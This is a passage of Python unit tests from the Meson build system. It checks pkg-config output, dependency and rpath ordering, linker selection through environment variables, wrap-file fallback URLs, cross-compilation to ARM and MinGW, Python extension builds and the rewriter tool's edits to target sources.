self.assertEqual(relative_path_dep.get_link_args(), link_args) @skipIfNoPkgconfig def test_pkgconfig_internal_libraries(self): ''' ''' with tempfile.TemporaryDirectory() as tempdirname: # build library testdirbase = os.path.join(self.unit_test_dir, '32 pkgconfig use libraries') testdirlib = os.path.join(testdirbase, 'lib') self.init(testdirlib, extra_args=['--prefix=' + tempdirname, '--libdir=lib', '--default-library=static'], default_args=False) self.build() self.install(use_destdir=False) # build user of library pkg_dir = os.path.join(tempdirname, 'lib/pkgconfig') self.new_builddir() self.init(os.path.join(testdirbase, 'app'), override_envvars={'PKG_CONFIG_PATH': pkg_dir}) self.build() @skipIfNoPkgconfig def test_static_archive_stripping(self): ''' Check that Meson produces valid static archives with --strip enabled ''' with tempfile.TemporaryDirectory() as tempdirname: testdirbase = os.path.join(self.unit_test_dir, '67 static archive stripping') # build lib self.new_builddir() testdirlib = os.path.join(testdirbase, 'lib') testlibprefix = os.path.join(tempdirname, 'libprefix') self.init(testdirlib, extra_args=['--prefix=' + testlibprefix, '--libdir=lib', '--default-library=static', '--buildtype=debug', '--strip'], default_args=False) self.build() self.install(use_destdir=False) # build executable (uses lib, fails if static archive has been stripped incorrectly) pkg_dir = os.path.join(testlibprefix, 'lib/pkgconfig') self.new_builddir() self.init(os.path.join(testdirbase, 'app'), override_envvars={'PKG_CONFIG_PATH': pkg_dir}) self.build() @skipIfNoPkgconfig def test_pkgconfig_formatting(self): testdir = os.path.join(self.unit_test_dir, '38 pkgconfig format') self.init(testdir) myenv = os.environ.copy() myenv['PKG_CONFIG_PATH'] = self.privatedir stdo = subprocess.check_output(['pkg-config', '--libs-only-l', 'libsomething'], env=myenv) deps = [b'-lgobject-2.0', b'-lgio-2.0', b'-lglib-2.0', b'-lsomething'] if is_windows() or is_cygwin() or is_osx() or is_openbsd(): # On Windows, libintl is a separate library deps.append(b'-lintl') self.assertEqual(set(deps), set(stdo.split())) @skipIfNoPkgconfig @skip_if_not_language('cs') def test_pkgconfig_csharp_library(self): testdir = os.path.join(self.unit_test_dir, '50 pkgconfig csharp library') self.init(testdir) myenv = os.environ.copy() myenv['PKG_CONFIG_PATH'] = self.privatedir stdo = subprocess.check_output(['pkg-config', '--libs', 'libsomething'], env=myenv) self.assertEqual("-r/usr/lib/libsomething.dll", str(stdo.decode('ascii')).strip()) @skipIfNoPkgconfig def test_pkgconfig_link_order(self): ''' Test that libraries are listed before their dependencies. ''' testdir = os.path.join(self.unit_test_dir, '53 pkgconfig static link order') self.init(testdir) myenv = os.environ.copy() myenv['PKG_CONFIG_PATH'] = self.privatedir stdo = subprocess.check_output(['pkg-config', '--libs', 'libsomething'], env=myenv) deps = stdo.split() self.assertTrue(deps.index(b'-lsomething') < deps.index(b'-ldependency')) def test_deterministic_dep_order(self): ''' Test that the dependencies are always listed in a deterministic order. ''' testdir = os.path.join(self.unit_test_dir, '43 dep order') self.init(testdir) with open(os.path.join(self.builddir, 'build.ninja')) as bfile: for line in bfile: if 'build myexe:' in line or 'build myexe.exe:' in line: self.assertIn('liblib1.a liblib2.a', line) return raise RuntimeError('Could not find the build rule') def test_deterministic_rpath_order(self): ''' Test that the rpaths are always listed in a deterministic order. ''' if is_cygwin(): raise unittest.SkipTest('rpath are not used on Cygwin') testdir = os.path.join(self.unit_test_dir, '42 rpath order') self.init(testdir) if is_osx(): rpathre = re.compile(r'-rpath,.*/subprojects/sub1.*-rpath,.*/subprojects/sub2') else: rpathre = re.compile(r'-rpath,\$\$ORIGIN/subprojects/sub1:\$\$ORIGIN/subprojects/sub2') with open(os.path.join(self.builddir, 'build.ninja')) as bfile: for line in bfile: if '-rpath' in line: self.assertRegex(line, rpathre) return raise RuntimeError('Could not find the rpath') def test_override_with_exe_dep(self): ''' Test that we produce the correct dependencies when a program is overridden with an executable. ''' testdir = os.path.join(self.src_root, 'test cases', 'native', '9 override with exe') self.init(testdir) with open(os.path.join(self.builddir, 'build.ninja')) as bfile: for line in bfile: if 'main1.c:' in line or 'main2.c:' in line: self.assertIn('| subprojects/sub/foobar', line) @skipIfNoPkgconfig def test_usage_external_library(self): ''' Test that uninstalled usage of an external library (from the system or PkgConfigDependency) works. On macOS, this workflow works out of the box. On Linux, BSDs, Windows, etc, you need to set extra arguments such as LD_LIBRARY_PATH, etc, so this test is skipped. The system library is found with cc.find_library() and pkg-config deps. ''' oldprefix = self.prefix # Install external library so we can find it testdir = os.path.join(self.unit_test_dir, '40 external, internal library rpath', 'external library') # install into installdir without using DESTDIR installdir = self.installdir self.prefix = installdir self.init(testdir) self.prefix = oldprefix self.build() self.install(use_destdir=False) ## New builddir for the consumer self.new_builddir() env = {'LIBRARY_PATH': os.path.join(installdir, self.libdir), 'PKG_CONFIG_PATH': os.path.join(installdir, self.libdir, 'pkgconfig')} testdir = os.path.join(self.unit_test_dir, '40 external, internal library rpath', 'built library') # install into installdir without using DESTDIR self.prefix = self.installdir self.init(testdir, override_envvars=env) self.prefix = oldprefix self.build(override_envvars=env) # test uninstalled self.run_tests(override_envvars=env) if not (is_osx() or is_linux()): return # test running after installation self.install(use_destdir=False) prog = os.path.join(self.installdir, 'bin', 'prog') self._run([prog]) if not is_osx(): # Rest of the workflow only works on macOS return out = self._run(['otool', '-L', prog]) self.assertNotIn('@rpath', out) ## New builddir for testing that DESTDIR is not added to install_name self.new_builddir() # install into installdir with DESTDIR self.init(testdir, override_envvars=env) self.build(override_envvars=env) # test running after installation self.install(override_envvars=env) prog = self.installdir + os.path.join(self.prefix, 'bin', 'prog') lib = self.installdir + os.path.join(self.prefix, 'lib', 'libbar_built.dylib') for f in prog, lib: out = self._run(['otool', '-L', f]) # Ensure that the otool output does not contain self.installdir self.assertNotRegex(out, self.installdir + '.*dylib ') @skipIfNoPkgconfig def test_usage_pkgconfig_prefixes(self): ''' Build and install two external libraries, to different prefixes, then build and install a client program that finds them via pkgconfig, and verify the installed client program runs. ''' oldinstalldir = self.installdir # Build and install both external libraries without DESTDIR val1dir = os.path.join(self.unit_test_dir, '76 pkgconfig prefixes', 'val1') val1prefix = os.path.join(oldinstalldir, 'val1') self.prefix = val1prefix self.installdir = val1prefix self.init(val1dir) self.build() self.install(use_destdir=False) self.new_builddir() env1 = {} env1['PKG_CONFIG_PATH'] = os.path.join(val1prefix, self.libdir, 'pkgconfig') val2dir = os.path.join(self.unit_test_dir, '76 pkgconfig prefixes', 'val2') val2prefix = os.path.join(oldinstalldir, 'val2') self.prefix = val2prefix self.installdir = val2prefix self.init(val2dir, override_envvars=env1) self.build() self.install(use_destdir=False) self.new_builddir() # Build, install, and run the client program env2 = {} env2['PKG_CONFIG_PATH'] = os.path.join(val2prefix, self.libdir, 'pkgconfig') testdir = os.path.join(self.unit_test_dir, '76 pkgconfig prefixes', 'client') testprefix = os.path.join(oldinstalldir, 'client') self.prefix = testprefix self.installdir = testprefix self.init(testdir, override_envvars=env2) self.build() self.install(use_destdir=False) prog = os.path.join(self.installdir, 'bin', 'client') env3 = {} if is_cygwin(): env3['PATH'] = os.path.join(val1prefix, 'bin') + \ os.pathsep + \ os.path.join(val2prefix, 'bin') + \ os.pathsep + os.environ['PATH'] out = self._run([prog], override_envvars=env3).strip() # Expected output is val1 + val2 = 3 self.assertEqual(out, '3') def install_subdir_invalid_symlinks(self, testdir, subdir_path): ''' Test that installation of broken symlinks works fine. https://github.com/mesonbuild/meson/issues/3914 ''' testdir = os.path.join(self.common_test_dir, testdir) subdir = os.path.join(testdir, subdir_path) with chdir(subdir): # Can't distribute broken symlinks in the source tree because it breaks # the creation of zipapps. Create it dynamically and run the test by # hand. src = '../../nonexistent.txt' os.symlink(src, 'invalid-symlink.txt') try: self.init(testdir) self.build() self.install() install_path = subdir_path.split(os.path.sep)[-1] link = os.path.join(self.installdir, 'usr', 'share', install_path, 'invalid-symlink.txt') self.assertTrue(os.path.islink(link), msg=link) self.assertEqual(src, os.readlink(link)) self.assertFalse(os.path.isfile(link), msg=link) finally: os.remove(os.path.join(subdir, 'invalid-symlink.txt')) def test_install_subdir_symlinks(self): self.install_subdir_invalid_symlinks('60 install subdir', os.path.join('sub', 'sub1')) def test_install_subdir_symlinks_with_default_umask(self): self.install_subdir_invalid_symlinks('191 install_mode', 'sub2') def test_install_subdir_symlinks_with_default_umask_and_mode(self): self.install_subdir_invalid_symlinks('191 install_mode', 'sub1') @skipIfNoPkgconfigDep('gmodule-2.0') def test_ldflag_dedup(self): testdir = os.path.join(self.unit_test_dir, '52 ldflagdedup') if is_cygwin() or is_osx(): raise unittest.SkipTest('Not applicable on Cygwin or OSX.') env = get_fake_env() cc = env.detect_c_compiler(MachineChoice.HOST) linker = cc.linker if not linker.export_dynamic_args(env): raise unittest.SkipTest('Not applicable for linkers without --export-dynamic') self.init(testdir) build_ninja = os.path.join(self.builddir, 'build.ninja') max_count = 0 search_term = '-Wl,--export-dynamic' with open(build_ninja, 'r', encoding='utf-8') as f: for line in f: max_count = max(max_count, line.count(search_term)) self.assertEqual(max_count, 1, 'Export dynamic incorrectly deduplicated.') def test_compiler_libs_static_dedup(self): testdir = os.path.join(self.unit_test_dir, '56 dedup compiler libs') self.init(testdir) build_ninja = os.path.join(self.builddir, 'build.ninja') with open(build_ninja, 'r', encoding='utf-8') as f: lines = f.readlines() for lib in ('-ldl', '-lm', '-lc', '-lrt'): for line in lines: if lib not in line: continue # Assert that self.assertEqual(len(line.split(lib)), 2, msg=(lib, line)) @skipIfNoPkgconfig def test_noncross_options(self): # C_std defined in project options must be in effect also when native compiling. testdir = os.path.join(self.unit_test_dir, '51 noncross options') self.init(testdir, extra_args=['-Dpkg_config_path=' + testdir]) compdb = self.get_compdb() self.assertEqual(len(compdb), 2) self.assertRegex(compdb[0]['command'], '-std=c99') self.assertRegex(compdb[1]['command'], '-std=c99') self.build() def test_identity_cross(self): testdir = os.path.join(self.unit_test_dir, '61 identity cross') nativefile = tempfile.NamedTemporaryFile(mode='w') nativefile.write(textwrap.dedent('''\ [binaries] c = ['{0}'] '''.format(os.path.join(testdir, 'build_wrapper.py')))) nativefile.flush() self.meson_native_file = nativefile.name crossfile = tempfile.NamedTemporaryFile(mode='w') crossfile.write(textwrap.dedent('''\ [binaries] c = ['{0}'] '''.format(os.path.join(testdir, 'host_wrapper.py')))) crossfile.flush() self.meson_cross_file = crossfile.name # TODO should someday be explicit about build platform only here self.init(testdir) def test_identity_cross_env(self): testdir = os.path.join(self.unit_test_dir, '61 identity cross') env = { 'CC_FOR_BUILD': '"' + os.path.join(testdir, 'build_wrapper.py') + '"', } crossfile = tempfile.NamedTemporaryFile(mode='w') crossfile.write(textwrap.dedent('''\ [binaries] c = ['{0}'] '''.format(os.path.join(testdir, 'host_wrapper.py')))) crossfile.flush() self.meson_cross_file = crossfile.name # TODO should someday be explicit about build platform only here self.init(testdir, override_envvars=env) @skipIfNoPkgconfig def test_static_link(self): if is_cygwin(): raise unittest.SkipTest("Cygwin doesn't support LD_LIBRARY_PATH.") # Build some libraries and install them testdir = os.path.join(self.unit_test_dir, '68 static link/lib') libdir = os.path.join(self.installdir, self.libdir) oldprefix = self.prefix self.prefix = self.installdir self.init(testdir) self.install(use_destdir=False) # Test that installed libraries works self.new_builddir() self.prefix = oldprefix meson_args = ['-Dc_link_args=-L{}'.format(libdir), '--fatal-meson-warnings'] testdir = os.path.join(self.unit_test_dir, '68 static link') env = {'PKG_CONFIG_LIBDIR': os.path.join(libdir, 'pkgconfig')} self.init(testdir, extra_args=meson_args, override_envvars=env) self.build() self.run_tests() def _check_ld(self, check: str, name: str, lang: str, expected: str) -> None: if is_sunos(): raise unittest.SkipTest('Solaris currently cannot override the linker.') if not shutil.which(check): raise unittest.SkipTest('Could not find {}.'.format(check)) envvars = [mesonbuild.envconfig.ENV_VAR_PROG_MAP['{}_ld'.format(lang)]] # Also test a deprecated variable if there is one. if f'{lang}_ld' in mesonbuild.envconfig.DEPRECATED_ENV_PROG_MAP: envvars.append( mesonbuild.envconfig.DEPRECATED_ENV_PROG_MAP[f'{lang}_ld']) for envvar in envvars: with mock.patch.dict(os.environ, {envvar: name}): env = get_fake_env() comp = getattr(env, 'detect_{}_compiler'.format(lang))(MachineChoice.HOST) if isinstance(comp, (mesonbuild.compilers.AppleClangCCompiler, mesonbuild.compilers.AppleClangCPPCompiler, mesonbuild.compilers.AppleClangObjCCompiler, mesonbuild.compilers.AppleClangObjCPPCompiler)): raise unittest.SkipTest('AppleClang is currently only supported with ld64') if lang != 'rust' and comp.use_linker_args('bfd') == []: raise unittest.SkipTest( 'Compiler {} does not support using alternative linkers'.format(comp.id)) self.assertEqual(comp.linker.id, expected) def test_ld_environment_variable_bfd(self): self._check_ld('ld.bfd', 'bfd', 'c', 'ld.bfd') def test_ld_environment_variable_gold(self): self._check_ld('ld.gold', 'gold', 'c', 'ld.gold') def test_ld_environment_variable_lld(self): self._check_ld('ld.lld', 'lld', 'c', 'ld.lld') @skip_if_not_language('rust') @skipIfNoExecutable('ld.gold') # need an additional check here because _check_ld checks for gcc def test_ld_environment_variable_rust(self): self._check_ld('gcc', 'gcc -fuse-ld=gold', 'rust', 'ld.gold') def test_ld_environment_variable_cpp(self): self._check_ld('ld.gold', 'gold', 'cpp', 'ld.gold') @skip_if_not_language('objc') def test_ld_environment_variable_objc(self): self._check_ld('ld.gold', 'gold', 'objc', 'ld.gold') @skip_if_not_language('objcpp') def test_ld_environment_variable_objcpp(self): self._check_ld('ld.gold', 'gold', 'objcpp', 'ld.gold') @skip_if_not_language('fortran') def test_ld_environment_variable_fortran(self): self._check_ld('ld.gold', 'gold', 'fortran', 'ld.gold') @skip_if_not_language('d') def test_ld_environment_variable_d(self): # At least for me, ldc defaults to gold, and gdc defaults to bfd, so # let's pick lld, which isn't the default for either (currently) self._check_ld('ld.lld', 'lld', 'd', 'ld.lld') def compute_sha256(self, filename): with open(filename, 'rb') as f: return hashlib.sha256(f.read()).hexdigest() def test_wrap_with_file_url(self): testdir = os.path.join(self.unit_test_dir, '74 wrap file url') source_filename = os.path.join(testdir, 'subprojects', 'foo.tar.xz') patch_filename = os.path.join(testdir, 'subprojects', 'foo-patch.tar.xz') wrap_filename = os.path.join(testdir, 'subprojects', 'foo.wrap') source_hash = self.compute_sha256(source_filename) patch_hash = self.compute_sha256(patch_filename) wrap = textwrap.dedent("""\ [wrap-file] directory = foo source_url = http://server.invalid/foo source_fallback_url = file://{} source_filename = foo.tar.xz source_hash = {} patch_url = http://server.invalid/foo patch_fallback_url = file://{} patch_filename = foo-patch.tar.xz patch_hash = {} """.format(source_filename, source_hash, patch_filename, patch_hash)) with open(wrap_filename, 'w') as f: f.write(wrap) self.init(testdir) self.build() self.run_tests() windows_proof_rmtree(os.path.join(testdir, 'subprojects', 'packagecache')) windows_proof_rmtree(os.path.join(testdir, 'subprojects', 'foo')) os.unlink(wrap_filename) def test_no_rpath_for_static(self): testdir = os.path.join(self.common_test_dir, '5 linkstatic') self.init(testdir) self.build() build_rpath = get_rpath(os.path.join(self.builddir, 'prog')) self.assertIsNone(build_rpath) def test_lookup_system_after_broken_fallback(self): # Just to generate libfoo.pc so we can test system dependency lookup. testdir = os.path.join(self.common_test_dir, '45 pkgconfig-gen') self.init(testdir) privatedir = self.privatedir # Write test project where the first dependency() returns not-found # because 'broken' subproject does not exit, but that should not prevent # the 2nd dependency() to lookup on system. self.new_builddir() with tempfile.TemporaryDirectory() as d: with open(os.path.join(d, 'meson.build'), 'w') as f: f.write(textwrap.dedent('''\ project('test') dependency('notfound', fallback: 'broken', required: false) dependency('libfoo', fallback: 'broken', required: true) ''')) self.init(d, override_envvars={'PKG_CONFIG_LIBDIR': privatedir}) def test_as_link_whole(self): testdir = os.path.join(self.unit_test_dir, '78 as link whole') self.init(testdir) with open(os.path.join(self.privatedir, 'bar1.pc')) as f: content = f.read() self.assertIn('-lfoo', content) with open(os.path.join(self.privatedir, 'bar2.pc')) as f: content = f.read() self.assertNotIn('-lfoo', content) def test_prelinking(self): # Prelinking currently only works on recently new GNU toolchains. # Skip everything else. When support for other toolchains is added, # remove limitations as necessary. if is_osx(): raise unittest.SkipTest('Prelinking not supported on Darwin.') if 'clang' in os.environ.get('CC', 'dummy'): raise unittest.SkipTest('Prelinking not supported with Clang.') gccver = subprocess.check_output(['cc', '--version']) if b'7.5.0' in gccver: raise unittest.SkipTest('GCC on Bionic is too old to be supported.') testdir = os.path.join(self.unit_test_dir, '87 prelinking') self.init(testdir) self.build() outlib = os.path.join(self.builddir, 'libprelinked.a') ar = shutil.which('ar') self.assertTrue(os.path.exists(outlib)) self.assertTrue(ar is not None) p = subprocess.run([ar, 't', outlib], stdout=subprocess.PIPE, stderr=subprocess.DEVNULL, universal_newlines=True, timeout=1) obj_files = p.stdout.strip().split('\n') self.assertEqual(len(obj_files), 1) self.assertTrue(obj_files[0].endswith('-prelink.o')) class BaseLinuxCrossTests(BasePlatformTests): # Don't pass --libdir when cross-compiling. We have tests that # check whether meson auto-detects it correctly. libdir = None def should_run_cross_arm_tests(): return shutil.which('arm-linux-gnueabihf-gcc') and not platform.machine().lower().startswith('arm') @unittest.skipUnless(not is_windows() and should_run_cross_arm_tests(), "requires ability to cross compile to ARM") class LinuxCrossArmTests(BaseLinuxCrossTests): ''' Tests that cross-compilation to Linux/ARM works ''' def setUp(self): super().setUp() src_root = os.path.dirname(__file__) self.meson_cross_file = os.path.join(src_root, 'cross', 'ubuntu-armhf.txt') def test_cflags_cross_environment_pollution(self): ''' Test that the CFLAGS environment variable does not pollute the cross environment. This can't be an ordinary test case because we need to inspect the compiler database. ''' testdir = os.path.join(self.common_test_dir, '3 static') self.init(testdir, override_envvars={'CFLAGS': '-DBUILD_ENVIRONMENT_ONLY'}) compdb = self.get_compdb() self.assertNotIn('-DBUILD_ENVIRONMENT_ONLY', compdb[0]['command']) def test_cross_file_overrides_always_args(self): ''' Test that $lang_args in cross files always override get_always_args(). Needed for overriding the default -D_FILE_OFFSET_BITS=64 on some architectures such as some Android versions and Raspbian. https://github.com/mesonbuild/meson/issues/3049 https://github.com/mesonbuild/meson/issues/3089 ''' testdir = os.path.join(self.unit_test_dir, '33 cross file overrides always args') self.meson_cross_file = os.path.join(testdir, 'ubuntu-armhf-overrides.txt') self.init(testdir) compdb = self.get_compdb() self.assertRegex(compdb[0]['command'], '-D_FILE_OFFSET_BITS=64.*-U_FILE_OFFSET_BITS') self.build() def test_cross_libdir(self): # When cross compiling "libdir" should default to "lib" # rather than "lib/x86_64-linux-gnu" or something like that. testdir = os.path.join(self.common_test_dir, '1 trivial') self.init(testdir) for i in self.introspect('--buildoptions'): if i['name'] == 'libdir': self.assertEqual(i['value'], 'lib') return self.assertTrue(False, 'Option libdir not in introspect data.') def test_cross_libdir_subproject(self): # Guard against a regression where calling "subproject" # would reset the value of libdir to its default value. testdir = os.path.join(self.unit_test_dir, '77 subdir libdir') self.init(testdir, extra_args=['--libdir=fuf']) for i in self.introspect('--buildoptions'): if i['name'] == 'libdir': self.assertEqual(i['value'], 'fuf') return self.assertTrue(False, 'Libdir specified on command line gets reset.') def test_std_remains(self): # C_std defined in project options must be in effect also when cross compiling. testdir = os.path.join(self.unit_test_dir, '51 noncross options') self.init(testdir) compdb = self.get_compdb() self.assertRegex(compdb[0]['command'], '-std=c99') self.build() @skipIfNoPkgconfig def test_pkg_config_option(self): if not shutil.which('arm-linux-gnueabihf-pkg-config'): raise unittest.SkipTest('Cross-pkgconfig not found.') testdir = os.path.join(self.unit_test_dir, '58 pkg_config_path option') self.init(testdir, extra_args=[ '-Dbuild.pkg_config_path=' + os.path.join(testdir, 'build_extra_path'), '-Dpkg_config_path=' + os.path.join(testdir, 'host_extra_path'), ]) def test_run_native_test(self): ''' https://github.com/mesonbuild/meson/issues/7997 check run native test in crossbuild without exe wrapper ''' testdir = os.path.join(self.unit_test_dir, '88 run native test') stamp_file = os.path.join(self.builddir, 'native_test_has_run.stamp') self.init(testdir) self.build() self.assertPathDoesNotExist(stamp_file) self.run_tests() self.assertPathExists(stamp_file) def should_run_cross_mingw_tests(): return shutil.which('x86_64-w64-mingw32-gcc') and not (is_windows() or is_cygwin()) @unittest.skipUnless(not is_windows() and should_run_cross_mingw_tests(), "requires ability to cross compile with MinGW") class LinuxCrossMingwTests(BaseLinuxCrossTests): ''' Tests that cross-compilation to Windows/MinGW works ''' def setUp(self): super().setUp() src_root = os.path.dirname(__file__) self.meson_cross_file = os.path.join(src_root, 'cross', 'linux-mingw-w64-64bit.txt') def test_exe_wrapper_behaviour(self): ''' Test that an exe wrapper that isn't found doesn't cause compiler sanity checks and compiler checks to fail, but causes configure to fail if it requires running a cross-built executable (custom_target or run_target) and causes the tests to be skipped if they are run. ''' testdir = os.path.join(self.unit_test_dir, '36 exe_wrapper behaviour') # Configures, builds, and tests fine by default self.init(testdir) self.build() self.run_tests() self.wipe() os.mkdir(self.builddir) # Change cross file to use a non-existing exe_wrapper and it should fail self.meson_cross_file = os.path.join(testdir, 'broken-cross.txt') # Force tracebacks so we can detect them properly env = {'MESON_FORCE_BACKTRACE': '1'} with self.assertRaisesRegex(MesonException, 'exe_wrapper.*target.*use-exe-wrapper'): # Must run in-process or we'll get a generic CalledProcessError self.init(testdir, extra_args='-Drun-target=false', inprocess=True, override_envvars=env) with self.assertRaisesRegex(MesonException, 'exe_wrapper.*run target.*run-prog'): # Must run in-process or we'll get a generic CalledProcessError self.init(testdir, extra_args='-Dcustom-target=false', inprocess=True, override_envvars=env) self.init(testdir, extra_args=['-Dcustom-target=false', '-Drun-target=false'], override_envvars=env) self.build() with self.assertRaisesRegex(MesonException, 'exe_wrapper.*PATH'): # Must run in-process or we'll get a generic CalledProcessError self.run_tests(inprocess=True, override_envvars=env) @skipIfNoPkgconfig def test_cross_pkg_config_option(self): testdir = os.path.join(self.unit_test_dir, '58 pkg_config_path option') self.init(testdir, extra_args=[ '-Dbuild.pkg_config_path=' + os.path.join(testdir, 'build_extra_path'), '-Dpkg_config_path=' + os.path.join(testdir, 'host_extra_path'), ]) class PythonTests(BasePlatformTests): ''' Tests that verify compilation of python extension modules ''' def test_versions(self): if self.backend is not Backend.ninja: raise unittest.SkipTest('Skipping python tests with {} backend'.format(self.backend.name)) testdir = os.path.join(self.src_root, 'test cases', 'unit', '39 python extmodule') # No python version specified, this will use meson's python self.init(testdir) self.build() self.run_tests() self.wipe() # When specifying a known name, (python2 / python3) the module # will also try 'python' as a fallback and use it if the major # version matches try: self.init(testdir, extra_args=['-Dpython=python2']) self.build() self.run_tests() except unittest.SkipTest: # python2 is not necessarily installed on the test machine, # if it is not, or the python headers can't be found, the test # will raise MESON_SKIP_TEST, we could check beforehand what version # of python is available, but it's a bit of a chicken and egg situation, # as that is the job of the module, so we just ask for forgiveness rather # than permission. pass self.wipe() for py in ('pypy', 'pypy3'): try: self.init(testdir, extra_args=['-Dpython=%s' % py]) except unittest.SkipTest: # Same as above, pypy2 and pypy3 are not expected to be present # on the test system, the test project only raises in these cases continue # We have a pypy, this is expected to work self.build() self.run_tests() self.wipe() # The test is configured to error out with MESON_SKIP_TEST # in case it could not find python with self.assertRaises(unittest.SkipTest): self.init(testdir, extra_args=['-Dpython=not-python']) self.wipe() # While dir is an external command on both Windows and Linux, # it certainly isn't python with self.assertRaises(unittest.SkipTest): self.init(testdir, extra_args=['-Dpython=dir']) self.wipe() class RewriterTests(BasePlatformTests): def setUp(self): super().setUp() self.maxDiff = None def prime(self, dirname): copy_tree(os.path.join(self.rewrite_test_dir, dirname), self.builddir) def rewrite_raw(self, directory, args): if isinstance(args, str): args = [args] command = self.rewrite_command + ['--verbose', '--skip', '--sourcedir', directory] + args p = subprocess.run(command, stdout=subprocess.PIPE, stderr=subprocess.PIPE, universal_newlines=True, timeout=60) print('STDOUT:') print(p.stdout) print('STDERR:') print(p.stderr) if p.returncode != 0: if 'MESON_SKIP_TEST' in p.stdout: raise unittest.SkipTest('Project requested skipping.') raise subprocess.CalledProcessError(p.returncode, command, output=p.stdout) if not p.stderr: return {} return json.loads(p.stderr) def rewrite(self, directory, args): if isinstance(args, str): args = [args] return self.rewrite_raw(directory, ['command'] + args) def test_target_source_list(self): self.prime('1 basic') out = self.rewrite(self.builddir, os.path.join(self.builddir, 'info.json')) expected = { 'target': { 'trivialprog0@exe': {'name': 'trivialprog0', 'sources': ['main.cpp', 'fileA.cpp', 'fileB.cpp', 'fileC.cpp']}, 'trivialprog1@exe': {'name': 'trivialprog1', 'sources': ['main.cpp', 'fileA.cpp']}, 'trivialprog2@exe': {'name': 'trivialprog2', 'sources': ['fileB.cpp', 'fileC.cpp']}, 'trivialprog3@exe': {'name': 'trivialprog3', 'sources': ['main.cpp', 'fileA.cpp']}, 'trivialprog4@exe': {'name': 'trivialprog4', 'sources': ['main.cpp', 'fileA.cpp']}, 'trivialprog5@exe': {'name': 'trivialprog5', 'sources': ['main.cpp', 'fileB.cpp', 'fileC.cpp']}, 'trivialprog6@exe': {'name': 'trivialprog6', 'sources': ['main.cpp', 'fileA.cpp']}, 'trivialprog7@exe': {'name': 'trivialprog7', 'sources': ['fileB.cpp', 'fileC.cpp', 'main.cpp', 'fileA.cpp']}, 'trivialprog8@exe': {'name': 'trivialprog8', 'sources': ['main.cpp', 'fileA.cpp']}, 'trivialprog9@exe': {'name': 'trivialprog9', 'sources': ['main.cpp', 'fileA.cpp']}, } } self.assertDictEqual(out, expected) def test_target_add_sources(self): self.prime('1 basic') out = self.rewrite(self.builddir, os.path.join(self.builddir, 'addSrc.json')) expected = { 'target': { 'trivialprog0@exe': {'name': 'trivialprog0', 'sources': ['a1.cpp', 'a2.cpp', 'a6.cpp', 'fileA.cpp', 'main.cpp', 'a7.cpp', 'fileB.cpp', 'fileC.cpp']}, 'trivialprog1@exe': {'name': 'trivialprog1', 'sources': ['a1.cpp', 'a2.cpp', 'a6.cpp', 'fileA.cpp', 'main.cpp']}, 'trivialprog2@exe': {'name': 'trivialprog2', 'sources': ['a7.cpp', 'fileB.cpp', 'fileC.cpp']}, 'trivialprog3@exe': {'name': 'trivialprog3', 'sources': ['a5.cpp', 'fileA.cpp', 'main.cpp']}, 'trivialprog4@exe': {'name': 'trivialprog4', 'sources': ['a5.cpp', 'main.cpp', 'fileA.cpp']}, 'trivialprog5@exe': {'name': 'trivialprog5', 'sources': ['a3.cpp', 'main.cpp', 'a7.cpp', 'fileB.cpp', 'fileC.cpp']}, 'trivialprog6@exe': {'name': 'trivialprog6', 'sources': ['main.cpp', 'fileA.cpp', 'a4.cpp']}, 'trivialprog7@exe': {'name': 'trivialprog7', 'sources': ['fileB.cpp', 'fileC.cpp', 'a1.cpp', 'a2.cpp', 'a6.cpp', 'fileA.cpp', 'main.cpp']}, 'trivialprog8@exe': {'name': 'trivialprog8', 'sources': ['a1.cpp', 'a2.cpp', 'a6.cpp', 'fileA.cpp', 'main.cpp']}, 'trivialprog9@exe': {'name': 'trivialprog9', 'sources': ['a1.cpp', 'a2.cpp', 'a6.cpp', 'fileA.cpp', 'main.cpp']}, } } self.assertDictEqual(out, expected) # Check the written file out = self.rewrite(self.builddir, os.path.join(self.builddir, 'info.json')) self.assertDictEqual(out, expected) def test_target_add_sources_abs(self): self.prime('1 basic') abs_src = [os.path.join(self.builddir, x) for x in ['a1.cpp', 'a2.cpp', 'a6.cpp']] add = json.dumps([{"type": "target", "target": "trivialprog1", "operation": "src_add", "sources": abs_src}]) inf = json.dumps([{"type": "target", "target": "trivialprog1", "operation": "info"}]) self.rewrite(self.builddir, add) out = self.rewrite(self.builddir, inf) expected = {'target': {'trivialprog1@exe': {'name': 'trivialprog1', 'sources': ['a1.cpp', 'a2.cpp', 'a6.cpp', 'fileA.cpp', 'main.cpp']}}} self.assertDictEqual(out, expected) def test_target_remove_sources(self): self.prime('1 basic') out = self.rewrite(self.builddir, os.path.join(self.builddir, 'rmSrc.json')) expected = { 'target': { 'trivialprog0@exe': {'name': 'trivialprog0', 'sources': ['main.cpp', 'fileC.cpp']}, 'trivialprog1@exe': {'name': 'trivialprog1', 'sources': ['main.cpp']}, 'trivialprog2@exe': {'name': 'trivialprog2', 'sources': ['fileC.cpp']}, 'trivialprog3@exe': {'name': 'trivialprog3', 'sources': ['main.cpp']}, 'trivialprog4@exe': {'name': 'trivialprog4', 'sources': ['main.cpp']}, 'trivialprog5@exe': {'name': 'trivialprog5', 'sources': ['main.cpp', 'fileC.cpp']}, 'trivialprog6@exe': {'name': 'trivialprog6', 'sources': ['main.cpp']}, 'trivialprog7@exe': {'name': 'trivialprog7', 'sources': ['fileC.cpp', 'main.cpp']}, 'trivialprog8@exe': {'name': 'trivialprog8', 'sources': ['main.cpp']}, 'trivialprog9@exe': {'name': 'trivialprog9', 'sources': ['main.cpp']}, } } self.assertDictEqual(out, expected) # Check the written file out = self.rewrite(self.builddir, os.path.join(self.builddir, 'info.json')) self.assertDictEqual(out, expected) def test_target_subdir(self): self.prime('2 subdirs') out = self.rewrite(self.builddir, os.path.join(self.builddir, 'addSrc.json')) expected = {'name': 'something', 'sources': ['first.c', 'second.c', 'third.c']} self.assertDictEqual(list(out['target'].values())[0], expected) # Check the written file out = self.rewrite(self.builddir, os.path.join(self.builddir, 'info.json')) self.assertDictEqual(list(out['target'].values())[0], expected) def test_target_remove(self): self.prime('1 basic') self.rewrite(self.builddir, os.path.join(self.builddir, 'rmTgt.json')) out = self.rewrite(self.builddir, os.path.join(self.builddir, 'info.json')) expected = { 'target': { 'trivialprog2@exe': {'name': 'trivialprog2', 'sources': ['fileB.cpp', 'fileC.cpp']}, 'trivialprog3@exe': {'name': 'trivialprog3', 'sources': ['main.cpp', 'fileA.cpp']}, 'trivialprog4@exe': {'name': 'trivialprog4', 'sources': ['main.cpp', 'fileA.cpp']}, 'trivialprog5@exe': {'name': 'trivialprog5', 'sources': 